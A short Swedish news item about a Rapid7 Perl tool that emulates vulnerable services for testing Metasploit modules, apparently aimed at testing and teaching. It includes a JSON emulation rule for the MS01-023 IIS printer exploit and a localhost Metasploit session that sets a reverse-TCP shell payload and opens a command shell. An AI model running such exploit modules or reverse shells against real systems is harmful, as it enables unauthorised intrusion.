Nytt verktyg för att testa Metasploit-moduler
Ett nytt verktyg för att testa metasploit-moduler har släppts. Med hjälp av detta nya verktyg så slipper du installera en hel virtuell miljö med Metasploitable eller liknande. Även är detta nya verktyg bra vid undervisning.
Verktyget är skrivet i perl och kan emulera olika typer av tjänster som du sedan kan köraen auxiliary-modul eller exploit-modul.
Emuleringen definieras med hjälp av JSON-regler som skrivs i service.cfg filen. En tjänst som går att exploita kan se ut så här:
"exploits/windows/iis/ms01_023_printer": { "desc": "", "extraCmds": "set payload windows/shell_reverse_tcp\r\nsetg LHOST 127.0.0.1", "defaultPort": [80], "seq": [ ["regex", "GET http:\/\/.*\/NULL.printer?"], ["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", ["action", ["connect", ":4444"]]] ] },
Och sedan när du ska utnyttja den så kör du enligt följande från metasploit:
msf > use exploit/windows/iis/ms01_023_printer msf > set payload windows/shell_reverse_tcp msf > setg RHOST 127.0.0.1 msf > setg LHOST 127.0.0.1 msf exploit(ms01_023_printer) > run [*] Started reverse TCP handler on 127.0.0.1:4444 [*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:51852) at 2017-01-20 10:47:12 -0600 >>ls README.md secret.txt server_cert.pem server_key.pem service.cfg vulEmu.pl
Du kan ladda hem verktyget från Rapid7:s Github-repo här: